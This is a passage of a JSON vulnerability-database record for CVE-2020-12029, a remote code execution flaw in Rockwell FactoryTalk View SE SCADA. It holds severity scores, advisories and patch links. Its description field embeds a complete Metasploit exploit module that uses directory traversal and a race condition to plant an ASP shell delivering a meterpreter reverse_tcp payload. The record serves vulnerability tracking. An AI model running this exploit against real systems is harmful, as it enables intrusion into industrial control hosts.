        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CVE-2020-12029",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.1,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 6.8,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-008257",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 6.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CNVD-2020-38691",
            "impactScore": 9.2,
            "integrityImpact": "COMPLETE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "VHN-164666",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "id": "CVE-2020-12029",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "ics-cert@hq.dhs.gov",
            "availabilityImpact": "NONE",
            "baseScore": 9.0,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.5,
            "id": "CVE-2020-12029",
            "impactScore": 5.8,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-008257",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "ZDI",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2020-12029",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 0.7,
            "userInteraction": "NONE",
            "vectorString": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2020-12029",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "ics-cert@hq.dhs.gov",
            "id": "CVE-2020-12029",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2020-008257",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "ZDI",
            "id": "CVE-2020-12029",
            "trust": 0.7,
            "value": "CRITICAL"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-38691",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202006-1224",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-164666",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-12029",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-20-730"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-38691"
      },
      {
        "db": "VULHUB",
        "id": "VHN-164666"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-12029"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008257"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-1224"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12029"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12029"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "All versions of FactoryTalk View SE do not properly validate input of filenames within a project directory. A remote, unauthenticated attacker may be able to execute a crafted file on a remote endpoint that may result in remote code execution (RCE). Rockwell Automation recommends applying patch 1126289. Before installing this patch, the patch rollup dated 06 Apr 2020 or later MUST be applied. 1066644 \u2013 Patch Roll-up for CPR9 SRx. FactoryTalk View SE There is an input verification vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Rockwell Automation FactoryTalk View SE. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of project files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  include Msf::Exploit::Powershell\n  include Msf::Exploit::Remote::HttpServer\n  include Msf::Exploit::Remote::HttpClient\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        \u0027Name\u0027 =\u003e \u0027Rockwell FactoryTalk View SE SCADA Unauthenticated Remote Code Execution\u0027,\n        \u0027Description\u0027 =\u003e %q{\n          This module exploits a series of vulnerabilities to achieve unauthenticated remote code execution\n          on the Rockwell FactoryTalk View SE SCADA product as the IIS user. \n          The attack relies on the chaining of five separate vulnerabilities. In order to achieve full remote code execution on all\n          targets, two information leak vulnerabilities are also abused. \n          This exploit was used by the Flashback team (Pedro Ribeiro + Radek Domanski) in Pwn2Own Miami 2020 to win the EWS category. \n        },\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027Author\u0027 =\u003e\n        [\n          \u0027Pedro Ribeiro \u003cpedrib[at]gmail.com\u003e\u0027, # Vulnerability discovery and Metasploit module\n          \u0027Radek Domanski \u003cradek.domanski[at]gmail.com\u003e\u0027 # Vulnerability discovery and Metasploit module\n        ],\n        \u0027References\u0027 =\u003e\n          [\n            [ \u0027URL\u0027, \u0027https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami\u0027],\n            [ \u0027URL\u0027, \u0027https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/replicant/replicant.md\u0027],\n            [ \u0027URL\u0027, \u0027https://github.com/rdomanski/Exploits_and_Advisories/tree/master/advisories/Pwn2Own/Miami2020/replicant.md\u0027],\n            [ \u0027CVE\u0027, \u00272020-12027\u0027],\n            [ \u0027CVE\u0027, \u00272020-12028\u0027],\n            [ \u0027CVE\u0027, \u00272020-12029\u0027],\n            [ \u0027ZDI\u0027, \u002720-727\u0027],\n            [ \u0027ZDI\u0027, \u002720-728\u0027],\n            [ \u0027ZDI\u0027, \u002720-729\u0027],\n            [ \u0027ZDI\u0027, \u002720-730\u0027],\n          ],\n        \u0027Privileged\u0027 =\u003e false,\n        \u0027Platform\u0027 =\u003e \u0027win\u0027,\n        \u0027Arch\u0027 =\u003e [ARCH_X86, ARCH_X64],\n        \u0027Stance\u0027 =\u003e Msf::Exploit::Stance::Aggressive,\n        \u0027Payload\u0027 =\u003e {\n          \u0027DefaultOptions\u0027 =\u003e\n            {\n              \u0027PAYLOAD\u0027 =\u003e \u0027windows/meterpreter/reverse_tcp\u0027\n            }\n        },\n        \u0027DefaultOptions\u0027 =\u003e { \u0027WfsDelay\u0027 =\u003e 20 },\n        \u0027Targets\u0027 =\u003e\n          [\n            [ \u0027Rockwell Automation FactoryTalk SE\u0027, {} ]\n          ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272020-06-22\u0027,\n        \u0027DefaultTarget\u0027 =\u003e 0\n      )\n    )\n    register_options(\n      [\n        Opt::RPORT(80),\n        OptString.new(\u0027SRVHOST\u0027, [true, \u0027IP address of the host serving the exploit\u0027]),\n        OptInt.new(\u0027SRVPORT\u0027, [true, \u0027Port of the host serving the exploit on\u0027, 8080]),\n        OptString.new(\u0027TARGETURI\u0027, [true, \u0027The base path to Rockwell FactoryTalk\u0027, \u0027/rsviewse/\u0027])\n      ]\n    )\n\n    register_advanced_options(\n      [\n        OptInt.new(\u0027SLEEP_RACER\u0027, [true, \u0027Number of seconds to wait for racer thread to finish\u0027, 15]),\n      ]\n    )\n  end\n\n  def send_to_factory(path)\n    send_request_cgi({\n      \u0027uri\u0027 =\u003e normalize_uri(target_uri, path),\n      \u0027method\u0027 =\u003e \u0027GET\u0027\n    })\n  end\n\n  def check\n    res = send_to_factory(\u0027/hmi_isapi.dll\u0027)\n    return Exploit::CheckCode::Safe unless res \u0026\u0026 res.code == 200\n\n    # Parse version from response body\n    # Example: Version 11.00.00.230\n    version = res.body.scan(/Version ([0-9\\.]{5,})/).flatten.first.to_s.split(\u0027.\u0027)\n\n    # Is returned version sound?\n    unless version.empty?\n      if version.length != 4\n        return Exploit::CheckCode::Detected\n      end\n\n      print_status(\"#{peer} - Detected Rockwell FactoryTalk View SE SCADA version #{version[0..3].join(\u0027.\u0027)}\")\n      if version[0].to_i == 11 \u0026\u0026 version[1].to_i == 0 \u0026\u0026 version[2].to_i == 0 \u0026\u0026 version[3].to_i == 230\n        # we know this exact version is vulnerable (11.00.00.230)\n        return Exploit::CheckCode::Appears\n      end\n\n      return Exploit::CheckCode::Detected\n    end\n\n    return Exploit::CheckCode::Unknown\n  end\n\n  def on_request_uri(cli, request)\n    if request.uri.include?(@shelly)\n      print_good(\"#{peer} - Target connected, sending payload\")\n      psh = cmd_psh_payload(\n        payload.encoded,\n        payload.arch.first\n        # without comspec it seems to fail, so keep it this way\n        # remove_comspec: true\n      )\n      # add double quotes for classic ASP escaping\n      psh.gsub!(\u0027\"\u0027, \u0027\"\"\u0027)\n\n      # NOTE: ASP payloads are broken in newer Windows (Win 2012 R2, Win 10) so we need to use powershell\n      # This is because the MSF ASP payload uses WScript.Shell.run(), which doesn\u0027t seem to work anymore... \n      # If this module is not working on an older Windows version, try the below as payload:\n      # payload = Msf::Util::EXE.to_exe_asp(generate_payload_exe)\n      payload = %{\u003c%CreateObject(\"WScript.Shell\").exec(\"#{psh}\")%\u003e}\n      send_response(cli, payload)\n      # payload file is deleted automatically by the server once we win the race!\n\n    elsif request.uri.include?(@proj_name)\n      # Directory traversal: vulnerable asp file will land in the path we provide\n      print_good(\"#{peer} - Target connected, sending file path with dir traversal\")\n      # Check the comments in the Infoleak 2 (project installation path) to understand why\n      filename = \"../SE/HMI Projects/#{@shelly}\"\n      send_response(cli, filename)\n    end\n  end\n\n  def exploit\n    # Infoleak 1 (project listing)\n    print_status(\"#{peer} - Listing projects on the server\")\n    res = send_to_factory(\u0027/hmi_isapi.dll?GetHMIProjects\u0027)\n\n    fail_with(Failure::UnexpectedReply, \u0027Failed to obtain project list. Bailing\u0027) unless\n      res \u0026\u0026 res.code == 200 \u0026\u0026 res.body.include?(\u0027HMIProject\u0027)\n\n    print_status(\"#{peer} - Received list of projects from the server\")\n    @proj_name = nil\n    proj_path = \u0027\u0027\n    xml = res.get_xml_document\n\n    # Parse XML project list and check each project for installation project path\n    xml.search(\u0027HMIProject\u0027).each do |project|\n      # Infoleak 2 (project installation path)\n      # In the original exploit, we used this to calculate the directory traversal path, but\n      # Google says the path is the same for all versions since at least 2007. \n      # Let\u0027s still abuse it to check if the project is valid. \n      url = \"/hmi_isapi.dll?GetHMIProjectPath\u0026#{project.attributes[\u0027Name\u0027]}\"\n      res = send_to_factory(url)\n\n      proj_path = res.body.strip\n\n      # Check if response contains :\\ that indicates a windows path\n      next unless proj_path.include?(\u0027:\\\\\u0027)\n\n      print_status(\"#{peer} - Found project path: #{proj_path}\")\n\n      # We only need first hit so we can quit the project parsing once we get it\n      if project.attributes[\u0027Name\u0027]\n        @proj_name = project.attributes[\u0027Name\u0027]\n        break\n      end\n    end\n\n    if !@proj_name\n      fail_with(Failure::UnexpectedReply, \u0027Failed to get a path from the XML to drop our shell, bailing out...\u0027)\n    end\n\n    shell_path = proj_path.sub(@proj_name, \u0027\u0027).strip\n    print_good(\"#{peer} - Got a path to drop our shell: #{shell_path}\")\n\n    # Start http server for project copy callback\n    http_service = \u0027http://\u0027 + datastore[\u0027SRVHOST\u0027] + \u0027:\u0027 + datastore[\u0027SRVPORT\u0027].to_s\n    print_status(\"#{peer} - Starting up our web service on #{http_service} ...\")\n\n    start_service({ \u0027Uri\u0027 =\u003e {\n      \u0027Proc\u0027 =\u003e proc do |cli, req|\n        on_request_uri(cli, req)\n      end,\n      # This path has to be capitalized as \"RSViewSE\" or else the exploit will fail!\n      \u0027Path\u0027 =\u003e \u0027/RSViewSE/\u0027\n    } })\n\n    # Race Condition\n    # This is the racer thread. It will continuously access our asp file until it gets executed\n    print_status(\"#{peer} - Starting racer thread, let\u0027s win this race condition!\")\n    @shelly = \"#{rand_text_alpha(5..10)}.asp\"\n    racer = Thread.new do\n      loop do\n        res = send_to_factory(\"/#{@shelly}\")\n        if res.code == 200\n          print_good(\"#{peer} - We\u0027ve won the race condition, shell incoming!\")\n          break\n        end\n      end\n    end\n\n    # Project Copy Request: target will connect to us to obtain project information. \n    print_status(\"#{peer} - Initiating project copy request...\")\n    url = \"/hmi_isapi.dll?StartRemoteProjectCopy\u0026#{@proj_name}\u0026#{rand_text_alpha(5..13)}\u0026#{datastore[\u0027SRVHOST\u0027]}:#{datastore[\u0027SRVPORT\u0027]}\u00261\"\n    res = send_to_factory(url)\n\n    # wait up to datastore[\u0027SLEEP_RACER\u0027] seconds for the racer thread to finish\n    count = 0\n    while count \u003c datastore[\u0027SLEEP_RACER\u0027]\n      break if racer.status == false\n\n      sleep(1)\n      count += 1\n    end\n    racer.exit\n  end\nend\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-12029"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008257"
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-730"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-38691"
      },
      {
        "db": "VULHUB",
        "id": "VHN-164666"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-12029"
      },
      {
        "db": "PACKETSTORM",
        "id": "160156"
      }
    ],
    "trust": 3.06
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-164666",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-164666"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-12029",
        "trust": 4.0
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-20-170-05",
        "trust": 3.2
      },
      {
        "db": "PACKETSTORM",
        "id": "160156",
        "trust": 1.9
      },
      {
        "db": "ZDI",
        "id": "ZDI-20-730",
        "trust": 1.3
      },
      {
        "db": "JVN",
        "id": "JVNVU97172119",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008257",
        "trust": 0.8
      },
      {
        "db": "ZDI_CAN",
        "id": "ZDI-CAN-10284",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-38691",
        "trust": 0.7
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-1224",
        "trust": 0.7
      },
      {
        "db": "NSFOCUS",
        "id": "47659",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-164666",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-12029",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-20-730"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-38691"
      },
      {
        "db": "VULHUB",
        "id": "VHN-164666"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-12029"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008257"
      },
      {
        "db": "PACKETSTORM",
        "id": "160156"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-1224"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12029"
      }
    ]
  },
  "id": "VAR-202007-0195",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-38691"
      },
      {
        "db": "VULHUB",
        "id": "VHN-164666"
      }
    ],
    "trust": 1.46428574
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "ICS"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-38691"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:59:09.803000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "https://www.rockwellautomation.com/en-us.html"
      },
      {
        "title": "Rockwell Automation has issued an update to correct this vulnerability.",
        "trust": 0.7,
        "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
      },
      {
        "title": "Patch for Rockwell Automation FactoryTalk View SE Input Verification Error Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/225399"
      },
      {
        "title": "Rockwell Automation FactoryTalk View SE Enter the fix for the verification error vulnerability",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=124853"
      },
      {
        "title": "Check Point Security Alerts: Rockwell Automation FactoryTalk View Remote Code Execution (CVE-2020-12029)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=check_point_security_alerts\u0026qid=14d703dfb95345fc9466389ccd1c348a"
      },
      {
        "title": "Exploits and Advisories\nCVEs\nExploits",
        "trust": 0.1,
        "url": "https://github.com/rdomanski/Exploits_and_Advisories "
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-20-730"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-38691"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-12029"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008257"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-1224"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-164666"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008257"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12029"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-170-05"
      },
      {
        "trust": 2.5,
        "url": "https://rockwellautomation.custhelp.com/app/answers/detail/a_id/1126944"
      },
      {
        "trust": 2.4,
        "url": "http://packetstormsecurity.com/files/160156/rockwell-factorytalk-view-se-scada-unauthenticated-remote-code-execution.html"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12029"
      },
      {
        "trust": 1.2,
        "url": "https://www.us-cert.gov/ics/advisories/icsa-20-170-05"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-12029"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu97172119/index.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.zerodayinitiative.com/advisories/zdi-20-730/"
      },
      {
        "trust": 0.6,
        "url": "http://www.nsfocus.net/vulndb/47659"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/20.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://advisories.checkpoint.com/defense/advisories/public/2023/cpai-2020-4079.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/rdomanski/exploits_and_advisories"
      },
      {
        "trust": 0.1,
        "url": "https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami\u0027],"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/rapid7/metasploit-framework"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12027"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/pedrib/poc/blob/master/advisories/pwn2own/miami_2020/replicant/replicant.md\u0027],"
      },
      {
        "trust": 0.1,
        "url": "https://metasploit.com/download"
      },
      {
        "trust": 0.1,
        "url": "http://\u0027"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/rdomanski/exploits_and_advisories/tree/master/advisories/pwn2own/miami2020/replicant.md\u0027],"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12028"
      }
    ],
    "sources": [
      {
        "db": "ZDI",
        "id": "ZDI-20-730"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-38691"
      },
      {
        "db": "VULHUB",
        "id": "VHN-164666"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-12029"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008257"
      },
      {
        "db": "PACKETSTORM",
        "id": "160156"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-1224"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12029"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "ZDI",
        "id": "ZDI-20-730"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-38691"
      },
      {
        "db": "VULHUB",
        "id": "VHN-164666"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-12029"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008257"
      },
      {
        "db": "PACKETSTORM",
        "id": "160156"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-1224"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12029"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-06-22T00:00:00",
        "db": "ZDI",
        "id": "ZDI-20-730"
      },
      {
        "date": "2020-07-14T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-38691"
      },
      {
        "date": "2020-07-20T00:00:00",
        "db": "VULHUB",
        "id": "VHN-164666"
      },
      {
        "date": "2020-07-20T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-12029"
      },
      {
        "date": "2020-09-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-008257"
      },
      {
        "date": "2020-11-20T15:46:41",
        "db": "PACKETSTORM",
        "id": "160156"
      },
      {
        "date": "2020-06-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202006-1224"
      },
      {
        "date": "2020-07-20T15:15:11.477000",
        "db": "NVD",
        "id": "CVE-2020-12029"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-06-22T00:00:00",
        "db": "ZDI",
        "id": "ZDI-20-730"
      },
      {
        "date": "2020-07-14T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-38691"
      },
      {
        "date": "2022-01-04T00:00:00",
        "db": "VULHUB",
        "id": "VHN-164666"
      },
      {
        "date": "2022-01-04T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-12029"
      },
      {
        "date": "2020-09-07T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-008257"
      },
      {
        "date": "2020-11-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202006-1224"
      },
      {
        "date": "2024-11-21T04:59:08.690000",
        "db": "NVD",
        "id": "CVE-2020-12029"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-1224"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "FactoryTalk View SE Vulnerability regarding input verification in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-008257"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-1224"
      }
    ],
    "trust": 0.6
  }
}

gsd-2020-12029

Vulnerability from gsd

Modified

2023-12-13 01:21

Details

Aliases

CVE-2020-12029

Aliases

CVE-2020-12029

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2020-12029",
